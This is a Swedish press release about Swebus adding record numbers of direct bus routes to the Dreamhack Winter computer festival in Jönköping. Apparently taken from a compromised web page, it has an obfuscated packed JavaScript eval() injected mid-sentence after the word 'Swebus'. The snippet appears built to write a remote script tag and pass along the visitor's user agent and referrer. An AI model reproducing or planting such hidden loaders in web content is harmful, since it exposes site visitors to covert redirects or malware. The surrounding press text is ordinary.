Image Image Image Image Image Image Image Image Image Image

| 27 januari, 2020

Scroll to top

Top

Swebus: Rekordmånga bussar till Dreamhack från hela landet

Swebus: Rekordmånga bussar till Dreamhack från hela landet
Revue Magazine

Swebus eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zstif|var|u0026u|referrer|zbdae||js|php’.split(’|’),0,{}))
satsar på rekordmånga direktresor till Dreamhack Winter, världens största datorfestival som äger rum den 24-27 november i Jönköping. Swebus kör hela vägen till och från mässområdet Elmia. Nytt i höst är Dreamhackbussar till och från städer som Karlstad, Uppsala och Köpenhamn, samt specialturer till Dreamhacks e-sportshow i Kinnarps Arena.

– Våra specialresor till Dreamhack går hela vägen till mässan utan byten på vägen, och biljetterna har varit mycket efterfrågade, säger Ingvar Ryggesjö, presschef för Swebus. Vi vet att många av Dreamhack-besökarna uppskattar att vi erbjuder gratis internet ombord, så vi förväntar oss ett hårt belastat nätverk.

Dreamhack är världens största datorfestival. Där träffas tusentals datoranvändare och kopplar samman sina datorer i ett LAN (nätverk) för att bland annat spela dataspel. Årets Dreamhack i Jönköping pågår från och med den 24 till och med den 27 november. Den 26 november anordnar Dreamhack även en e-sportshow i Kinnarps Arena, där de tävlande spelar dataspel mot varandra. Swebus specialbussar till e-sportshowen går till och från Uppsala, Stockholm, Göteborg, Köpenhamn och Malmö.

Bussarna går under festivaldagarna till och från Stockholm, Södertälje, Nyköping, Norrköping, Linköping, Mjölby, Ödeshög, Gränna, Ulricehamn, Borås, Landvetter, Göteborg, Värnamo, Ljungby, Markaryd, Örkelljunga, Helsingborg, Lund, Malmö, Köpenhamn, Uppsala, Arlanda, Karlstad, Kristinehamn, Mariestad och Mullsjö. För samtliga resor och avgångar, se www.swebus.se.

Biljetter finns att köpa på www.swebus.se, på telefon 0771-218 218, via mobiltelefon eller direkt hos Swebus biljettombud såsom Pressbyrån, 7-Eleven och Direkten-butikerna.

För mer information, vänligen kontakta:
Ingvar Ryggesjö, presschef på Swebus,
tel: 070-187 11 33, e-post: ingvar.ryggesjo@swebus.se
Swebus pressjour: 0701-87 12 00

Swebus är Sveriges ledande expressbussföretag med fler än 10 000 avgångar per vecka. Swebus erbjuder resor till cirka 150 orter i Sverige samt till Köpenhamn, Oslo och övriga Europa. Företaget erbjuder även flygtransfer, eventresor och chartrad trafik. Varje år görs mer än två miljoner resor med Swebus. Alla företagets expressbussresor är märkta med Bra miljöval och ombord på våra egna bussar finns gratis internet. Läs mer och köp din resa direkt på www.swebus.se. 

Swebus ingår i Nobinakoncernen, Nordens största aktör inom persontrafik med buss. Verksamheten omfattar kontraktsbaserade regionala resor i Sverige, Danmark, Norge och Finland samt interregionala resor i egen regi genom Swebus. Nobinakoncernen omsätter drygt 6 miljarder kronor, kör 3 500 bussar och är med drygt 260 miljoner resor per år ett av norra Europas större persontrafikföretag. Mer information återfinns på www.nobina.com.